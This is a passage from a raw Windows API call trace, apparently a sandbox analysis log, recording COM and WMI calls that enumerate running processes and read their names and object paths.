(This=0x5635c78) returned 0x3 [0214.743] IUnknown:QueryInterface (in: This=0x5635c78, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.743] IUnknown:QueryInterface (in: This=0x5635c78, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.743] IUnknown:QueryInterface (in: This=0x5635c78, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5635c7c) returned 0x0 [0214.743] IMarshal:GetUnmarshalClass (in: This=0x5635c7c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.743] IUnknown:Release (This=0x5635c7c) returned 0x3 [0214.743] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.743] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.743] IUnknown:QueryInterface (in: This=0x5635c78, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.743] IUnknown:Release (This=0x5635c78) returned 0x2 [0214.743] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.743] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.743] IUnknown:QueryInterface (in: This=0x5635c78, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5635c78) returned 0x0 [0214.743] IUnknown:AddRef (This=0x5635c78) returned 0x4 [0214.744] IUnknown:Release (This=0x5635c78) returned 0x3 [0214.744] IUnknown:Release (This=0x5635c78) returned 0x2 [0214.744] CoTaskMemFree (pv=0x5632228) [0214.744] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.744] IUnknown:AddRef (This=0x5635c78) returned 0x3 [0214.744] IWbemClassObject:Get (in: This=0x5635c78, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.744] IWbemClassObject:Get (in: This=0x5635c78, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2600\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.744] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2600\"") returned 0x66 [0214.744] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2600\"") returned 0x66 [0214.744] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.745] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.745] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.745] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.745] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5632228) returned 0x0 [0214.746] WbemDefPath:IUnknown:QueryInterface (in: This=0x5632228, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.746] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5632228, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5637f00) returned 0x0 [0214.746] WbemDefPath:IUnknown:Release (This=0x5632228) returned 0x0 [0214.746] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637f00, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5637f00) returned 0x0 [0214.746] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637f00, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.746] WbemDefPath:IUnknown:AddRef (This=0x5637f00) returned 0x3 [0214.746] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637f00, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.746] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637f00, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.746] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637f00, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5632238) returned 0x0 [0214.746] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5632238, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.746] WbemDefPath:IUnknown:Release (This=0x5632238) returned 0x3 [0214.746] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.746] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.746] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637f00, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.746] WbemDefPath:IUnknown:Release (This=0x5637f00) returned 0x2 [0214.746] WbemDefPath:IUnknown:Release (This=0x5637f00) returned 0x1 [0214.747] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.747] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.747] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637f00, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5637f00) returned 0x0 [0214.747] WbemDefPath:IUnknown:AddRef (This=0x5637f00) returned 0x3 [0214.747] WbemDefPath:IUnknown:Release (This=0x5637f00) returned 0x2 [0214.747] WbemDefPath:IWbemPath:SetText (This=0x5637f00, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2600\"") returned 0x0 [0214.747] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.747] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.747] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.747] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.747] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.747] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.747] IWbemClassObject:Get (in: This=0x5635c78, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2699840*=0, plFlavor=0x2699844*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spcwin.exe", varVal2=0x0), pType=0x2699840*=8, plFlavor=0x2699844*=0) returned 0x0 [0214.747] SysStringByteLen (bstr="spcwin.exe") returned 0x14 [0214.747] SysStringByteLen (bstr="spcwin.exe") returned 0x14 [0214.747] IWbemClassObject:Get (in: This=0x5635c78, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2699840*=8, plFlavor=0x2699844*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spcwin.exe", varVal2=0x0), pType=0x2699840*=8, plFlavor=0x2699844*=0) returned 0x0 [0214.747] SysStringByteLen (bstr="spcwin.exe") returned 0x14 [0214.747] SysStringByteLen (bstr="spcwin.exe") returned 0x14 [0214.747] CoTaskMemAlloc (cb=0x4) returned 0x5632268 [0214.748] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5632268, puReturned=0x267acc0 | out: apObjects=0x5632268*=0x5635e10, puReturned=0x267acc0*=0x1) returned 0x0 [0214.748] IUnknown:QueryInterface (in: This=0x5635e10, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5635e10) returned 0x0 [0214.748] IUnknown:QueryInterface (in: This=0x5635e10, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.748] IUnknown:QueryInterface (in: This=0x5635e10, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.749] IUnknown:AddRef (This=0x5635e10) returned 0x3 [0214.749] IUnknown:QueryInterface (in: This=0x5635e10, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.749] IUnknown:QueryInterface (in: This=0x5635e10, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.749] IUnknown:QueryInterface (in: This=0x5635e10, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5635e14) returned 0x0 [0214.749] IMarshal:GetUnmarshalClass (in: This=0x5635e14, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.749] IUnknown:Release (This=0x5635e14) returned 0x3 [0214.749] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.749] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.749] IUnknown:QueryInterface (in: This=0x5635e10, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.749] IUnknown:Release (This=0x5635e10) returned 0x2 [0214.749] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.749] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.749] IUnknown:QueryInterface (in: This=0x5635e10, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5635e10) returned 0x0 [0214.749] IUnknown:AddRef (This=0x5635e10) returned 0x4 [0214.749] IUnknown:Release (This=0x5635e10) returned 0x3 [0214.749] IUnknown:Release (This=0x5635e10) returned 0x2 [0214.749] CoTaskMemFree (pv=0x5632268) [0214.750] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.750] IUnknown:AddRef (This=0x5635e10) returned 0x3 [0214.750] IWbemClassObject:Get (in: This=0x5635e10, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.750] IWbemClassObject:Get (in: This=0x5635e10, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1136\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.750] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1136\"") returned 0x66 [0214.750] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1136\"") returned 0x66 [0214.750] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.750] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.750] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.750] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.751] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5632268) returned 0x0 [0214.751] WbemDefPath:IUnknown:QueryInterface (in: This=0x5632268, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.751] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5632268, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5637fe0) returned 0x0 [0214.751] WbemDefPath:IUnknown:Release (This=0x5632268) returned 0x0 [0214.751] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637fe0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5637fe0) returned 0x0 [0214.751] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637fe0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.752] WbemDefPath:IUnknown:AddRef (This=0x5637fe0) returned 0x3 [0214.752] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637fe0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.752] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637fe0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.752] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637fe0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5632278) returned 0x0 [0214.752] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5632278, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.752] WbemDefPath:IUnknown:Release (This=0x5632278) returned 0x3 [0214.752] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.752] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.752] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637fe0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.752] WbemDefPath:IUnknown:Release (This=0x5637fe0) returned 0x2 [0214.752] WbemDefPath:IUnknown:Release (This=0x5637fe0) returned 0x1 [0214.752] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.752] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.752] WbemDefPath:IUnknown:QueryInterface (in: This=0x5637fe0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5637fe0) returned 0x0 [0214.752] WbemDefPath:IUnknown:AddRef (This=0x5637fe0) returned 0x3 [0214.752] WbemDefPath:IUnknown:Release (This=0x5637fe0) returned 0x2 [0214.752] WbemDefPath:IWbemPath:SetText (This=0x5637fe0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1136\"") returned 0x0 [0214.752] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.752] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.753] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.753] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.753] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.753] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.753] IWbemClassObject:Get (in: This=0x5635e10, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269a0ac*=0, plFlavor=0x269a0b0*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spgagentservice.exe", varVal2=0x0), pType=0x269a0ac*=8, plFlavor=0x269a0b0*=0) returned 0x0 [0214.753] SysStringByteLen (bstr="spgagentservice.exe") returned 0x26 [0214.753] SysStringByteLen (bstr="spgagentservice.exe") returned 0x26 [0214.753] IWbemClassObject:Get (in: This=0x5635e10, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269a0ac*=8, plFlavor=0x269a0b0*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spgagentservice.exe", varVal2=0x0), pType=0x269a0ac*=8, plFlavor=0x269a0b0*=0) returned 0x0 [0214.753] SysStringByteLen (bstr="spgagentservice.exe") returned 0x26 [0214.753] SysStringByteLen (bstr="spgagentservice.exe") returned 0x26 [0214.753] CoTaskMemAlloc (cb=0x4) returned 0x56322a8 [0214.753] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56322a8, puReturned=0x267acc0 | out: apObjects=0x56322a8*=0x5635fa8, puReturned=0x267acc0*=0x1) returned 0x0 [0214.754] IUnknown:QueryInterface (in: This=0x5635fa8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, 